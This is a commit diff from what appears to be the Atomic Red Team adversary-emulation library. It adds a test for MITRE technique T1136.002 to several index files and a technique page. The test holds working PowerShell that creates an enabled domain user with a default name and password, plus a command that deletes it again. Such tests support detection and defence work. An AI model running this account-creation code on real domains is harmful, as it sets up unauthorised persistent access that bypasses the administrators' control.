Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -249,6 +249,7 @@
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+  - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -630,6 +630,7 @@
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+  - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -11752,6 +11752,43 @@ persistence:
 '
         name: command_prompt
         elevation_required: false
+    - name: Create a new Domain Account using PowerShell
+      auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+      description: 'Creates a new Domain User using the credentials of the Current
+        User
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        username:
+          description: Name of the Account to be created
+          type: String
+          default: T1136.002_Admin
+        password:
+          description: Password of the Account to be created
+          type: String
+          default: T1136_pass123!
+      executor:
+        command: |
+          $SamAccountName = '#{username}'
+          $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+          Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+          $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+          $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+          $User.SamAccountName = $SamAccountName
+          $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+          $User.SetPassword($TempCred.GetNetworkCredential().Password)
+          $User.Enabled = $True
+          $User.PasswordNotRequired = $False
+          $User.DisplayName = $SamAccountName
+          $User.Save()
+          $User
+        cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+        name: powershell
+        elevation_required: false
   T1078.002:
     technique:
       external_references:

atomics/T1136.002/T1136.002.md

@@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not
 
 - [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon)
 
+- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell)
+
 
 <br/>
 
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Create a new Domain Account using PowerShell
+Creates a new Domain User using the credentials of the Current User
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| username | Name of the Account to be created | String | T1136.002_Admin|
+| password | Password of the Account to be created | String | T1136_pass123!|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$SamAccountName = '#{username}'
+$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+$User.SamAccountName = $SamAccountName
+$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+$User.SetPassword($TempCred.GetNetworkCredential().Password)
+$User.Enabled = $True
+$User.PasswordNotRequired = $False
+$User.DisplayName = $SamAccountName
+$User.Save()
+$User
+```
+
+#### Cleanup Commands:
+```powershell
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+
 <br/>